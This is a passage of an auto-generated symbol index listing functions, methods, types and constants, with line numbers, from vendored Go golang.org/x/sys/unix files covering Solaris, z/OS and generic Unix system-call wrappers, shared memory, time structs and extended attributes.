SetKevent(k *Kevent_t, fd, mode, flags int) { method SetLen (line 23) | func (iov *Iovec) SetLen(length int) { method SetControllen (line 27) | func (msghdr *Msghdr) SetControllen(length int) { method SetIovlen (line 31) | func (msghdr *Msghdr) SetIovlen(length int) { method SetLen (line 35) | func (cmsg *Cmsghdr) SetLen(length int) { constant SYS___SYSCTL (line 41) | SYS___SYSCTL = SYS_SYSCTL FILE: vendor/golang.org/x/sys/unix/syscall_solaris.go type syscallFunc (line 25) | type syscallFunc function rawSysvicall6 (line 27) | func rawSysvicall6(trap, nargs, a1, a2, a3, a4, a5, a6 uintptr) (r1, r2 ... function sysvicall6 (line 28) | func sysvicall6(trap, nargs, a1, a2, a3, a4, a5, a6 uintptr) (r1, r2 uin... type SockaddrDatalink (line 31) | type SockaddrDatalink struct function direntIno (line 42) | func direntIno(buf []byte) (uint64, bool) { function direntReclen (line 46) | func direntReclen(buf []byte) (uint64, bool) { function direntNamlen (line 50) | func direntNamlen(buf []byte) (uint64, bool) { function Pipe (line 60) | func Pipe(p []int) (err error) { function Pipe2 (line 78) | func Pipe2(p []int, flags int) error { method sockaddr (line 91) | func (sa *SockaddrInet4) sockaddr() (unsafe.Pointer, _Socklen, error) { method sockaddr (line 103) | func (sa *SockaddrInet6) sockaddr() (unsafe.Pointer, _Socklen, error) { method sockaddr (line 116) | func (sa *SockaddrUnix) sockaddr() (unsafe.Pointer, _Socklen, error) { function Getsockname (line 143) | func Getsockname(fd int) (sa Sockaddr, err error) { function GetsockoptString (line 154) | func GetsockoptString(fd, level, opt int) (string, error) { constant ImplementsGetwd (line 164) | ImplementsGetwd = true function Getwd (line 168) | func Getwd() (wd string, err error) { function Getgroups (line 189) | func Getgroups() (gids []int, err error) { function Setgroups (line 214) | func Setgroups(gids []int) (err error) { function ReadDirent (line 227) | func ReadDirent(fd int, buf []byte) (n int, err error) { type WaitStatus (line 239) | type WaitStatus method Exited (line 250) | func (w WaitStatus) Exited() bool { return w&mask == exited } method ExitStatus (line 252) | func (w WaitStatus) ExitStatus() int { method Signaled (line 259) | func (w WaitStatus) Signaled() bool { return w&mask != stopped && w&ma... method Signal (line 261) | func (w WaitStatus) Signal() syscall.Signal { method CoreDump (line 269) | func (w WaitStatus) CoreDump() bool { return w.Signaled() && w&core !=... method Stopped (line 271) | func (w WaitStatus) Stopped() bool { return w&mask == stopped && sysca... method Continued (line 273) | func (w WaitStatus) Continued() bool { return w&mask == stopped && sys... method StopSignal (line 275) | func (w WaitStatus) StopSignal() syscall.Signal { method TrapCause (line 282) | func (w WaitStatus) TrapCause() int { return -1 } constant mask (line 242) | mask = 0x7F constant core (line 243) | core = 0x80 constant shift (line 244) | shift = 8 constant exited (line 246) | exited = 0 constant stopped (line 247) | stopped = 0x7F function Wait4 (line 286) | func Wait4(pid int, wstatus *WaitStatus, options int, rusage *Rusage) (i... function Gethostname (line 301) | func Gethostname() (name string, err error) { function Utimes (line 316) | func Utimes(path string, tv []Timeval) (err error) { function UtimesNano (line 328) | func UtimesNano(path string, ts []Timespec) error { function UtimesNanoAt (line 338) | func UtimesNanoAt(dirfd int, path string, ts []Timespec, flags int) error { function FcntlInt (line 351) | func FcntlInt(fd uintptr, cmd, arg int) (int, error) { function FcntlFlock (line 361) | func FcntlFlock(fd uintptr, cmd int, lk *Flock_t) error { function Futimesat (line 371) | func Futimesat(dirfd int, path string, tv []Timeval) error { function Futimes (line 388) | func Futimes(fd int, tv []Timeval) error { function anyToSockaddr (line 398) | func anyToSockaddr(fd int, rsa *RawSockaddrAny) (Sockaddr, error) { function Accept (line 437) | func Accept(fd int) (nfd int, sa Sockaddr, err error) { function recvmsgRaw (line 454) | func recvmsgRaw(fd int, iov []Iovec, oob []byte, flags int, rsa *RawSock... function sendmsgN (line 482) | func sendmsgN(fd int, iov []Iovec, oob []byte, ptr unsafe.Pointer, salen... function Acct (line 514) | func Acct(path string) (err error) { function Mkdev (line 529) | func Mkdev(major, minor uint32) uint64 { function Major (line 535) | func Major(dev uint64) uint32 { function Minor (line 541) | func Minor(dev uint64) uint32 { function ioctl (line 552) | func ioctl(fd int, req int, arg uintptr) (err error) { function ioctlPtr (line 557) | func ioctlPtr(fd int, req int, arg unsafe.Pointer) (err error) { function IoctlSetTermio (line 562) | func IoctlSetTermio(fd int, req int, value *Termio) error { function IoctlGetTermio (line 566) | func IoctlGetTermio(fd int, req int) (*Termio, error) { function Poll (line 574) | func Poll(fds []PollFd, timeout int) (n int, err error) { function Sendfile (line 581) | func Sendfile(outfd int, infd int, offset *int64, count int) (written in... type fileObjCookie (line 704) | type fileObjCookie struct type EventPort (line 710) | type EventPort struct method Close (line 765) | func (e *EventPort) Close() error { method PathIsWatched (line 779) | func (e *EventPort) PathIsWatched(path string) bool { method FdIsWatched (line 787) | func (e *EventPort) FdIsWatched(fd uintptr) bool { method AssociatePath (line 796) | func (e *EventPort) AssociatePath(path string, stat os.FileInfo, event... method DissociatePath (line 816) | func (e *EventPort) DissociatePath(path string) error { method AssociateFd (line 840) | func (e *EventPort) AssociateFd(fd uintptr, events int, cookie interfa... method DissociateFd (line 860) | func (e *EventPort) DissociateFd(fd uintptr) error { method GetOne (line 902) | func (e *EventPort) GetOne(t *Timespec) (*PortEvent, error) { method peIntToExt (line 920) | func (e *EventPort) peIntToExt(peInt *portEvent, peExt *PortEvent) err... method Pending (line 958) | func (e *EventPort) Pending() (int, error) { method Get (line 968) | func (e *EventPort) Get(s []PortEvent, min int, timeout *Timespec) (in... type PortEvent (line 733) | type PortEvent struct function NewEventPort (line 744) | func NewEventPort() (*EventPort, error) { function createFileObjCookie (line 880) | func createFileObjCookie(name string, stat os.FileInfo, cookie interface... function Putmsg (line 1004) | func Putmsg(fd int, cl []byte, data []byte, flags int) (err error) { function Getmsg (line 1023) | func Getmsg(fd int, cl []byte, data []byte) (retCl []byte, retData []byt... function IoctlSetIntRetInt (line 1051) | func IoctlSetIntRetInt(fd int, req int, arg int) (int, error) { function IoctlSetString (line 1055) | func IoctlSetString(fd int, req int, val string) error { method SetName (line 1065) | func (l *Lifreq) SetName(name string) error { method SetLifruInt (line 1075) | func (l *Lifreq) SetLifruInt(d int) { method GetLifruInt (line 1079) | func (l *Lifreq) GetLifruInt() int { method SetLifruUint (line 1083) | func (l *Lifreq) SetLifruUint(d uint) { method GetLifruUint (line 1087) | func (l *Lifreq) GetLifruUint() uint { function IoctlLifreq (line 1091) | func IoctlLifreq(fd int, req int, l *Lifreq) error { method SetInt (line 1097) | func (s *Strioctl) SetInt(i int) { function IoctlSetStrioctlRetInt (line 1102) | func IoctlSetStrioctlRetInt(fd int, req int, s *Strioctl) (int, error) { FILE: vendor/golang.org/x/sys/unix/syscall_solaris_amd64.go function setTimespec (line 9) | func setTimespec(sec, nsec int64) Timespec { function setTimeval (line 13) | func setTimeval(sec, usec int64) Timeval { method SetLen (line 17) | func (iov *Iovec) SetLen(length int) { method SetIovlen (line 21) | func (msghdr *Msghdr) SetIovlen(length int) { method SetLen (line 25) | func (cmsg *Cmsghdr) SetLen(length int) { FILE: vendor/golang.org/x/sys/unix/syscall_unix.go function errnoErr (line 38) | func errnoErr(e syscall.Errno) error { function ErrnoName (line 53) | func ErrnoName(e syscall.Errno) string { function SignalName (line 64) | func SignalName(s syscall.Signal) string { function SignalNum (line 77) | func SignalNum(s string) syscall.Signal { function clen (line 88) | func clen(n []byte) int { type mmapper (line 98) | type mmapper struct method Mmap (line 105) | func (m *mmapper) Mmap(fd int, offset int64, length int, prot int, fla... method Munmap (line 127) | func (m *mmapper) Munmap(data []byte) (err error) { function Mmap (line 149) | func Mmap(fd int, offset int64, length int, prot int, flags int) (data [... function Munmap (line 153) | func Munmap(b []byte) (err error) { function Read (line 157) | func Read(fd int, p []byte) (n int, err error) { function Write (line 170) | func Write(fd int, p []byte) (n int, err error) { function Pread (line 181) | func Pread(fd int, p []byte, offset int64) (n int, err error) { function Pwrite (line 194) | func Pwrite(fd int, p []byte, offset int64) (n int, err error) { type Sockaddr (line 210) | type Sockaddr interface type SockaddrInet4 (line 215) | type SockaddrInet4 struct type SockaddrInet6 (line 222) | type SockaddrInet6 struct type SockaddrUnix (line 230) | type SockaddrUnix struct function Bind (line 235) | func Bind(fd int, sa Sockaddr) (err error) { function Connect (line 243) | func Connect(fd int, sa Sockaddr) (err error) { function Getpeername (line 251) | func Getpeername(fd int) (sa Sockaddr, err error) { function GetsockoptByte (line 260) | func GetsockoptByte(fd, level, opt int) (value byte, err error) { function GetsockoptInt (line 267) | func GetsockoptInt(fd, level, opt int) (value int, err error) { function GetsockoptInet4Addr (line 274) | func GetsockoptInet4Addr(fd, level, opt int) (value [4]byte, err error) { function GetsockoptIPMreq (line 280) | func GetsockoptIPMreq(fd, level, opt int) (*IPMreq, error) { function GetsockoptIPv6Mreq (line 287) | func GetsockoptIPv6Mreq(fd, level, opt int) (*IPv6Mreq, error) { function GetsockoptIPv6MTUInfo (line 294) | func GetsockoptIPv6MTUInfo(fd, level, opt int) (*IPv6MTUInfo, error) { function GetsockoptICMPv6Filter (line 301) | func GetsockoptICMPv6Filter(fd, level, opt int) (*ICMPv6Filter, error) { function GetsockoptLinger (line 308) | func GetsockoptLinger(fd, level, opt int) (*Linger, error) { function GetsockoptTimeval (line 315) | func GetsockoptTimeval(fd, level, opt int) (*Timeval, error) { function GetsockoptUint64 (line 322) | func GetsockoptUint64(fd, level, opt int) (value uint64, err error) { function Recvfrom (line 329) | func Recvfrom(fd int, p []byte, flags int) (n int, from Sockaddr, err er... function Recvmsg (line 354) | func Recvmsg(fd int, p, oob []byte, flags int) (n, oobn int, recvflags i... function RecvmsgBuffers (line 372) | func RecvmsgBuffers(fd int, buffers [][]byte, oob []byte, flags int) (n,... function Sendmsg (line 393) | func Sendmsg(fd int, p, oob []byte, to Sockaddr, flags int) (err error) { function SendmsgN (line 422) | func SendmsgN(fd int, p, oob []byte, to Sockaddr, flags int) (n int, err... function SendmsgBuffers (line 442) | func SendmsgBuffers(fd int, buffers [][]byte, oob []byte, to Sockaddr, f... function Send (line 463) | func Send(s int, buf []byte, flags int) (err error) { function Sendto (line 467) | func Sendto(fd int, p []byte, flags int, to Sockaddr) (err error) { function SetsockoptByte (line 479) | func SetsockoptByte(fd, level, opt int, value byte) (err error) { function SetsockoptInt (line 483) | func SetsockoptInt(fd, level, opt int, value int) (err error) { function SetsockoptInet4Addr (line 488) | func SetsockoptInet4Addr(fd, level, opt int, value [4]byte) (err error) { function SetsockoptIPMreq (line 492) | func SetsockoptIPMreq(fd, level, opt int, mreq *IPMreq) (err error) { function SetsockoptIPv6Mreq (line 496) | func SetsockoptIPv6Mreq(fd, level, opt int, mreq *IPv6Mreq) (err error) { function SetsockoptICMPv6Filter (line 500) | func SetsockoptICMPv6Filter(fd, level, opt int, filter *ICMPv6Filter) er... function SetsockoptLinger (line 504) | func SetsockoptLinger(fd, level, opt int, l *Linger) (err error) { function SetsockoptString (line 508) | func SetsockoptString(fd, level, opt int, s string) (err error) { function SetsockoptTimeval (line 516) | func SetsockoptTimeval(fd, level, opt int, tv *Timeval) (err error) { function SetsockoptUint64 (line 520) | func SetsockoptUint64(fd, level, opt int, value uint64) (err error) { function Socket (line 524) | func Socket(domain, typ, proto int) (fd int, err error) { function Socketpair (line 532) | func Socketpair(domain, typ, proto int) (fd [2]int, err error) { function CloseOnExec (line 544) | func CloseOnExec(fd int) { fcntl(fd, F_SETFD, FD_CLOEXEC) } function SetNonblock (line 546) | func SetNonblock(fd int, nonblocking bool) (err error) { function Exec (line 568) | func Exec(argv0 string, argv []string, envv []string) error { function Lutimes (line 577) | func Lutimes(path string, tv []Timeval) error { function emptyIovecs (line 592) | func emptyIovecs(iov []Iovec) bool { function Setrlimit (line 602) | func Setrlimit(resource int, rlim *Rlimit) error { FILE: vendor/golang.org/x/sys/unix/syscall_unix_gc.go function Syscall (line 11) | func Syscall(trap, a1, a2, a3 uintptr) (r1, r2 uintptr, err syscall.Errno) function Syscall6 (line 12) | func Syscall6(trap, a1, a2, a3, a4, a5, a6 uintptr) (r1, r2 uintptr, err... function RawSyscall (line 13) | func RawSyscall(trap, a1, a2, a3 uintptr) (r1, r2 uintptr, err syscall.E... function RawSyscall6 (line 14) | func RawSyscall6(trap, a1, a2, a3, a4, a5, a6 uintptr) (r1, r2 uintptr, ... FILE: vendor/golang.org/x/sys/unix/syscall_unix_gc_ppc64x.go function Syscall (line 11) | func Syscall(trap, a1, a2, a3 uintptr) (r1, r2 uintptr, err syscall.Errn... function Syscall6 (line 14) | func Syscall6(trap, a1, a2, a3, a4, a5, a6 uintptr) (r1, r2 uintptr, err... function RawSyscall (line 17) | func RawSyscall(trap, a1, a2, a3 uintptr) (r1, r2 uintptr, err syscall.E... function RawSyscall6 (line 20) | func RawSyscall6(trap, a1, a2, a3, a4, a5, a6 uintptr) (r1, r2 uintptr, ... FILE: vendor/golang.org/x/sys/unix/syscall_zos_s390x.go constant O_CLOEXEC (line 21) | O_CLOEXEC = 0 constant AF_LOCAL (line 22) | AF_LOCAL = AF_UNIX function syscall_syscall (line 25) | func syscall_syscall(trap, a1, a2, a3 uintptr) (r1, r2 uintptr, err Errno) function syscall_rawsyscall (line 26) | func syscall_rawsyscall(trap, a1, a2, a3 uintptr) (r1, r2 uintptr, err E... function syscall_syscall6 (line 27) | func syscall_syscall6(trap, a1, a2, a3, a4, a5, a6 uintptr) (r1, r2 uint... function syscall_rawsyscall6 (line 28) | func syscall_rawsyscall6(trap, a1, a2, a3, a4, a5, a6 uintptr) (r1, r2 u... function syscall_syscall9 (line 29) | func syscall_syscall9(trap, a1, a2, a3, a4, a5, a6, a7, a8, a9 uintptr) ... function syscall_rawsyscall9 (line 30) | func syscall_rawsyscall9(trap, a1, a2, a3, a4, a5, a6, a7, a8, a9 uintpt... function copyStat (line 32) | func copyStat(stat *Stat_t, statLE *Stat_LE_t) { function svcCall (line 51) | func svcCall(fnptr unsafe.Pointer, argv *unsafe.Pointer, dsa *uint64) function svcLoad (line 52) | func svcLoad(name *byte) unsafe.Pointer function svcUnload (line 53) | func svcUnload(name *byte, fnptr unsafe.Pointer) int64 method NameString (line 55) | func (d *Dirent) NameString() string { function anyToSockaddr (line 109) | func anyToSockaddr(_ int, rsa *RawSockaddrAny) (Sockaddr, error) { function Accept (line 164) | func Accept(fd int) (nfd int, sa Sockaddr, err error) { method SetLen (line 180) | func (iov *Iovec) SetLen(length int) { method SetControllen (line 184) | func (msghdr *Msghdr) SetControllen(length int) { method SetLen (line 188) | func (cmsg *Cmsghdr) SetLen(length int) { function Fstat (line 232) | func Fstat(fd int, stat *Stat_t) (err error) { function Ptsname (line 256) | func Ptsname(fd int) (name string, err error) { function u2s (line 265) | func u2s(cstr unsafe.Pointer) string { function Close (line 274) | func Close(fd int) (err error) { function Madvise (line 287) | func Madvise(b []byte, advice int) (err error) { function Getpgrp (line 298) | func Getpgrp() (pid int) { function Getrusage (line 309) | func Getrusage(who int, rusage *Rusage) (err error) { function Lstat (line 328) | func Lstat(path string, stat *Stat_t) (err error) { function Stat (line 355) | func Stat(path string, sta *Stat_t) (err error) { function Open (line 373) | func Open(path string, mode int, perm uint32) (fd int, err error) { function Mkfifoat (line 377) | func Mkfifoat(dirfd int, path string, mode uint32) (err error) { function Remove (line 393) | func Remove(path string) error { constant ImplementsGetwd (line 397) | ImplementsGetwd = true function Getcwd (line 399) | func Getcwd(buf []byte) (n int, err error) { function Getwd (line 414) | func Getwd() (wd string, err error) { function Getgroups (line 427) | func Getgroups() (gids []int, err error) { function Setgroups (line 453) | func Setgroups(gids []int) (err error) { function gettid (line 465) | func gettid() uint64 function Gettid (line 467) | func Gettid() (tid int) { type WaitStatus (line 471) | type WaitStatus method Exited (line 490) | func (w WaitStatus) Exited() bool { return w&mask == exited } method Signaled (line 492) | func (w WaitStatus) Signaled() bool { return w&mask != stopped && w&ma... method Stopped (line 494) | func (w WaitStatus) Stopped() bool { return w&0xFF == stopped } method Continued (line 496) | func (w WaitStatus) Continued() bool { return w == 0xFFFF } method CoreDump (line 498) | func (w WaitStatus) CoreDump() bool { return w.Signaled() && w&core !=... method ExitStatus (line 500) | func (w WaitStatus) ExitStatus() int { method Signal (line 507) | func (w WaitStatus) Signal() Signal { method StopSignal (line 514) | func (w WaitStatus) StopSignal() Signal { method TrapCause (line 521) | func (w WaitStatus) TrapCause() int { return -1 } constant mask (line 483) | mask = 0x7F constant core (line 484) | core = 0x80 constant exited (line 485) | exited = 0x00 constant stopped (line 486) | stopped = 0x7F constant shift (line 487) | shift = 8 function Wait4 (line 525) | func Wait4(pid int, wstatus *WaitStatus, options int, rusage *Rusage) (w... function Gettimeofday (line 538) | func Gettimeofday(tv *Timeval) (err error) { function Time (line 546) | func Time(t *Time_t) (tt Time_t, err error) { function setTimespec (line 558) | func setTimespec(sec, nsec int64) Timespec { function setTimeval (line 562) | func setTimeval(sec, usec int64) Timeval { //fix function Pipe (line 568) | func Pipe(p []int) (err error) { function Utimes (line 583) | func Utimes(path string, tv []Timeval) (err error) { function UtimesNano (line 590) | func UtimesNano(path string, ts []Timespec) error { function Getsockname (line 603) | func Getsockname(fd int) (sa Sockaddr, err error) { constant nwmHeaderIdentifier (line 615) | nwmHeaderIdentifier = 0xd5e6d4c8 constant nwmFilterIdentifier (line 616) | nwmFilterIdentifier = 0xd5e6d4c6 constant nwmTCPConnIdentifier (line 617) | nwmTCPConnIdentifier = 0xd5e6d4c3 constant nwmRecHeaderIdentifier (line 618) | nwmRecHeaderIdentifier = 0xd5e6d4d9 constant nwmIPStatsIdentifier (line 619) | nwmIPStatsIdentifier = 0xd5e6d4c9d7e2e340 constant nwmIPGStatsIdentifier (line 620) | nwmIPGStatsIdentifier = 0xd5e6d4c9d7c7e2e3 constant nwmTCPStatsIdentifier (line 621) | nwmTCPStatsIdentifier = 0xd5e6d4e3c3d7e2e3 constant nwmUDPStatsIdentifier (line 622) | nwmUDPStatsIdentifier = 0xd5e6d4e4c4d7e2e3 constant nwmICMPGStatsEntry (line 623) | nwmICMPGStatsEntry = 0xd5e6d4c9c3d4d7c7 constant nwmICMPTStatsEntry (line 624) | nwmICMPTStatsEntry = 0xd5e6d4c9c3d4d7e3 constant nwmVersion1 (line 627) | nwmVersion1 = 1 constant nwmVersion2 (line 628) | nwmVersion2 = 2 constant nwmCurrentVer (line 629) | nwmCurrentVer = 2 constant nwmTCPConnType (line 631) | nwmTCPConnType = 1 constant nwmGlobalStatsType (line 632) | nwmGlobalStatsType = 14 constant nwmFilterLclAddrMask (line 635) | nwmFilterLclAddrMask = 0x20000000 constant nwmFilterSrcAddrMask (line 636) | nwmFilterSrcAddrMask = 0x20000000 constant nwmFilterLclPortMask (line 637) | nwmFilterLclPortMask = 0x10000000 constant nwmFilterSrcPortMask (line 638) | nwmFilterSrcPortMask = 0x10000000 constant nwmTCPStateClosed (line 641) | nwmTCPStateClosed = 1 constant nwmTCPStateListen (line 642) | nwmTCPStateListen = 2 constant nwmTCPStateSynSent (line 643) | nwmTCPStateSynSent = 3 constant nwmTCPStateSynRcvd (line 644) | nwmTCPStateSynRcvd = 4 constant nwmTCPStateEstab (line 645) | nwmTCPStateEstab = 5 constant nwmTCPStateFinWait1 (line 646) | nwmTCPStateFinWait1 = 6 constant nwmTCPStateFinWait2 (line 647) | nwmTCPStateFinWait2 = 7 constant nwmTCPStateClosWait (line 648) | nwmTCPStateClosWait = 8 constant nwmTCPStateLastAck (line 649) | nwmTCPStateLastAck = 9 constant nwmTCPStateClosing (line 650) | nwmTCPStateClosing = 10 constant nwmTCPStateTimeWait (line 651) | nwmTCPStateTimeWait = 11 constant nwmTCPStateDeletTCB (line 652) | nwmTCPStateDeletTCB = 12 constant BPF_TCP_CLOSE (line 655) | BPF_TCP_CLOSE = 1 constant BPF_TCP_LISTEN (line 656) | BPF_TCP_LISTEN = 2 constant BPF_TCP_SYN_SENT (line 657) | BPF_TCP_SYN_SENT = 3 constant BPF_TCP_SYN_RECV (line 658) | BPF_TCP_SYN_RECV = 4 constant BPF_TCP_ESTABLISHED (line 659) | BPF_TCP_ESTABLISHED = 5 constant BPF_TCP_FIN_WAIT1 (line 660) | BPF_TCP_FIN_WAIT1 = 6 constant BPF_TCP_FIN_WAIT2 (line 661) | BPF_TCP_FIN_WAIT2 = 7 constant BPF_TCP_CLOSE_WAIT (line 662) | BPF_TCP_CLOSE_WAIT = 8 constant BPF_TCP_LAST_ACK (line 663) | BPF_TCP_LAST_ACK = 9 constant BPF_TCP_CLOSING (line 664) | BPF_TCP_CLOSING = 10 constant BPF_TCP_TIME_WAIT (line 665) | BPF_TCP_TIME_WAIT = 11 constant BPF_TCP_NEW_SYN_RECV (line 666) | BPF_TCP_NEW_SYN_RECV = -1 constant BPF_TCP_MAX_STATES (line 667) | BPF_TCP_MAX_STATES = -2 type nwmTriplet (line 670) | type nwmTriplet struct type nwmQuadruplet (line 676) | type nwmQuadruplet struct type nwmHeader (line 683) | type nwmHeader struct type nwmFilter (line 695) | type nwmFilter struct type nwmRecHeader (line 728) | type nwmRecHeader struct type nwmTCPStatsEntry (line 735) | type nwmTCPStatsEntry struct type nwmConnEntry (line 813) | type nwmConnEntry struct constant svc_EZBNMIF4 (line 895) | svc_EZBNMIF4 = 0 function GetsockoptTCPInfo (line 898) | func GetsockoptTCPInfo(fd, level, opt int) (*TCPInfo, error) { function GetsockoptString (line 1099) | func GetsockoptString(fd, level, opt int) (string, error) { function Recvmsg (line 1110) | func Recvmsg(fd int, p, oob []byte, flags int) (n, oobn int, recvflags i... function Sendmsg (line 1145) | func Sendmsg(fd int, p, oob []byte, to Sockaddr, flags int) (err error) { function SendmsgN (line 1150) | func SendmsgN(fd int, p, oob []byte, to Sockaddr, flags int) (n int, err... function Opendir (line 1189) | func Opendir(name string) (uintptr, error) { function clearErrno (line 1203) | func clearErrno() function Readdir (line 1205) | func Readdir(dir uintptr) (*Dirent, error) { function readdir_r (line 1225) | func readdir_r(dirp uintptr, entry *direntLE, result **direntLE) (err er... function Closedir (line 1233) | func Closedir(dir uintptr) error { function Seekdir (line 1241) | func Seekdir(dir uintptr, pos int) { function Telldir (line 1245) | func Telldir(dir uintptr) (int, error) { function FcntlFlock (line 1255) | func FcntlFlock(fd uintptr, cmd int, lk *Flock_t) error { function Flock (line 1276) | func Flock(fd int, how int) error { function Mlock (line 1309) | func Mlock(b []byte) (err error) { function Mlock2 (line 1317) | func Mlock2(b []byte, flags int) (err error) { function Mlockall (line 1325) | func Mlockall(flags int) (err error) { function Munlock (line 1333) | func Munlock(b []byte) (err error) { function Munlockall (line 1341) | func Munlockall() (err error) { function ClockGettime (line 1349) | func ClockGettime(clockid int32, ts *Timespec) error { function Statfs (line 1375) | func Statfs(path string, stat *Statfs_t) (err error) { function errnoErr (line 1405) | func errnoErr(e Errno) error { function ErrnoName (line 1420) | func ErrnoName(e Errno) string { function SignalName (line 1431) | func SignalName(s syscall.Signal) string { function SignalNum (line 1444) | func SignalNum(s string) syscall.Signal { function clen (line 1455) | func clen(n []byte) int { type mmapper (line 1465) | type mmapper struct method Mmap (line 1472) | func (m *mmapper) Mmap(fd int, offset int64, length int, prot int, fla... method Munmap (line 1501) | func (m *mmapper) Munmap(data []byte) (err error) { function Read (line 1523) | func Read(fd int, p []byte) (n int, err error) { function Write (line 1536) | func Write(fd int, p []byte) (n int, err error) { type Sockaddr (line 1552) | type Sockaddr interface type SockaddrInet4 (line 1557) | type SockaddrInet4 struct method sockaddr (line 68) | func (sa *SockaddrInet4) sockaddr() (unsafe.Pointer, _Socklen, error) { type SockaddrInet6 (line 1564) | type SockaddrInet6 struct method sockaddr (line 81) | func (sa *SockaddrInet6) sockaddr() (unsafe.Pointer, _Socklen, error) { type SockaddrUnix (line 1572) | type SockaddrUnix struct method sockaddr (line 95) | func (sa *SockaddrUnix) sockaddr() (unsafe.Pointer, _Socklen, error) { function Bind (line 1577) | func Bind(fd int, sa Sockaddr) (err error) { function Connect (line 1585) | func Connect(fd int, sa Sockaddr) (err error) { function Getpeername (line 1593) | func Getpeername(fd int) (sa Sockaddr, err error) { function GetsockoptByte (line 1602) | func GetsockoptByte(fd, level, opt int) (value byte, err error) { function GetsockoptInt (line 1609) | func GetsockoptInt(fd, level, opt int) (value int, err error) { function GetsockoptInet4Addr (line 1616) | func GetsockoptInet4Addr(fd, level, opt int) (value [4]byte, err error) { function GetsockoptIPMreq (line 1622) | func GetsockoptIPMreq(fd, level, opt int) (*IPMreq, error) { function GetsockoptIPv6Mreq (line 1629) | func GetsockoptIPv6Mreq(fd, level, opt int) (*IPv6Mreq, error) { function GetsockoptIPv6MTUInfo (line 1636) | func GetsockoptIPv6MTUInfo(fd, level, opt int) (*IPv6MTUInfo, error) { function GetsockoptICMPv6Filter (line 1643) | func GetsockoptICMPv6Filter(fd, level, opt int) (*ICMPv6Filter, error) { function GetsockoptLinger (line 1650) | func GetsockoptLinger(fd, level, opt int) (*Linger, error) { function GetsockoptTimeval (line 1657) | func GetsockoptTimeval(fd, level, opt int) (*Timeval, error) { function GetsockoptUint64 (line 1664) | func GetsockoptUint64(fd, level, opt int) (value uint64, err error) { function Recvfrom (line 1671) | func Recvfrom(fd int, p []byte, flags int) (n int, from Sockaddr, err er... function Sendto (line 1683) | func Sendto(fd int, p []byte, flags int, to Sockaddr) (err error) { function SetsockoptByte (line 1691) | func SetsockoptByte(fd, level, opt int, value byte) (err error) { function SetsockoptInt (line 1695) | func SetsockoptInt(fd, level, opt int, value int) (err error) { function SetsockoptInet4Addr (line 1700) | func SetsockoptInet4Addr(fd, level, opt int, value [4]byte) (err error) { function SetsockoptIPMreq (line 1704) | func SetsockoptIPMreq(fd, level, opt int, mreq *IPMreq) (err error) { function SetsockoptIPv6Mreq (line 1708) | func SetsockoptIPv6Mreq(fd, level, opt int, mreq *IPv6Mreq) (err error) { function SetsockoptICMPv6Filter (line 1712) | func SetsockoptICMPv6Filter(fd, level, opt int, filter *ICMPv6Filter) er... function SetsockoptLinger (line 1716) | func SetsockoptLinger(fd, level, opt int, l *Linger) (err error) { function SetsockoptString (line 1720) | func SetsockoptString(fd, level, opt int, s string) (err error) { function SetsockoptTimeval (line 1728) | func SetsockoptTimeval(fd, level, opt int, tv *Timeval) (err error) { function SetsockoptUint64 (line 1732) | func SetsockoptUint64(fd, level, opt int, value uint64) (err error) { function Socket (line 1736) | func Socket(domain, typ, proto int) (fd int, err error) { function Socketpair (line 1744) | func Socketpair(domain, typ, proto int) (fd [2]int, err error) { function CloseOnExec (line 1756) | func CloseOnExec(fd int) { fcntl(fd, F_SETFD, FD_CLOEXEC) } function SetNonblock (line 1758) | func SetNonblock(fd int, nonblocking bool) (err error) { function Exec (line 1777) | func Exec(argv0 string, argv []string, envv []string) error { function Mount (line 1781) | func Mount(source string, target string, fstype string, flags uintptr, d... function Unmount (line 1790) | func Unmount(name string, mtm int) (err error) { function fdToPath (line 1825) | func fdToPath(dirfd int) (path string, err error) { function direntLeToDirentUnix (line 1860) | func direntLeToDirentUnix(dirent *direntLE, dir uintptr, path string) (D... function Getdirentries (line 1885) | func Getdirentries(fd int, buf []byte, basep *uintptr) (n int, err error) { function ReadDirent (line 1959) | func ReadDirent(fd int, buf []byte) (n int, err error) { function direntIno (line 1964) | func direntIno(buf []byte) (uint64, bool) { function direntReclen (line 1968) | func direntReclen(buf []byte) (uint64, bool) { function direntNamlen (line 1972) | func direntNamlen(buf []byte) (uint64, bool) { FILE: vendor/golang.org/x/sys/unix/sysvshm_linux.go function SysvShmCtl (line 13) | func SysvShmCtl(id, cmd int, desc *SysvShmDesc) (result int, err error) { FILE: vendor/golang.org/x/sys/unix/sysvshm_unix.go function SysvShmAttach (line 13) | func SysvShmAttach(id int, addr uintptr, flag int) ([]byte, error) { function SysvShmDetach (line 39) | func SysvShmDetach(data []byte) error { function SysvShmGet (line 49) | func SysvShmGet(key, size, flag int) (id int, err error) { FILE: vendor/golang.org/x/sys/unix/sysvshm_unix_other.go function SysvShmCtl (line 11) | func SysvShmCtl(id, cmd int, desc *SysvShmDesc) (result int, err error) { FILE: vendor/golang.org/x/sys/unix/timestruct.go function TimespecToNsec (line 12) | func TimespecToNsec(ts Timespec) int64 { return ts.Nano() } function NsecToTimespec (line 15) | func NsecToTimespec(nsec int64) Timespec { function TimeToTimespec (line 29) | func TimeToTimespec(t time.Time) (Timespec, error) { function TimevalToNsec (line 44) | func TimevalToNsec(tv Timeval) int64 { return tv.Nano() } function NsecToTimeval (line 47) | func NsecToTimeval(nsec int64) Timeval { method Unix (line 59) | func (ts *Timespec) Unix() (sec int64, nsec int64) { method Unix (line 64) | func (tv *Timeval) Unix() (sec int64, nsec int64) { method Nano (line 69) | func (ts *Timespec) Nano() int64 { method Nano (line 74) | func (tv *Timeval) Nano() int64 { FILE: vendor/golang.org/x/sys/unix/unveil_openbsd.go function Unveil (line 13) | func Unveil(path string, flags string) error { function UnveilBlock (line 30) | func UnveilBlock() error { function supportsUnveil (line 39) | func supportsUnveil() error { FILE: vendor/golang.org/x/sys/unix/xattr_bsd.go function xattrnamespace (line 16) | func xattrnamespace(fullattr string) (ns int, attr string, err error) { function initxattrdest (line 35) | func initxattrdest(dest []byte, idx int) (d unsafe.Pointer) { function Getxattr (line 50) | func Getxattr(file string, attr string, dest []byte) (sz int, err error) { function Fgetxattr (line 62) | func Fgetxattr(fd int, attr string, dest []byte) (sz int, err error) { function Lgetxattr (line 74) | func Lgetxattr(link string, attr string, dest []byte) (sz int, err error) { function Fsetxattr (line 88) | func Fsetxattr(fd int, attr string, data []byte, flags int) (err error) { function Setxattr (line 104) | func Setxattr(file string, attr string, data []byte, flags int) (err err... function Lsetxattr (line 120) | func Lsetxattr(link string, attr string, data []byte, flags int) (err 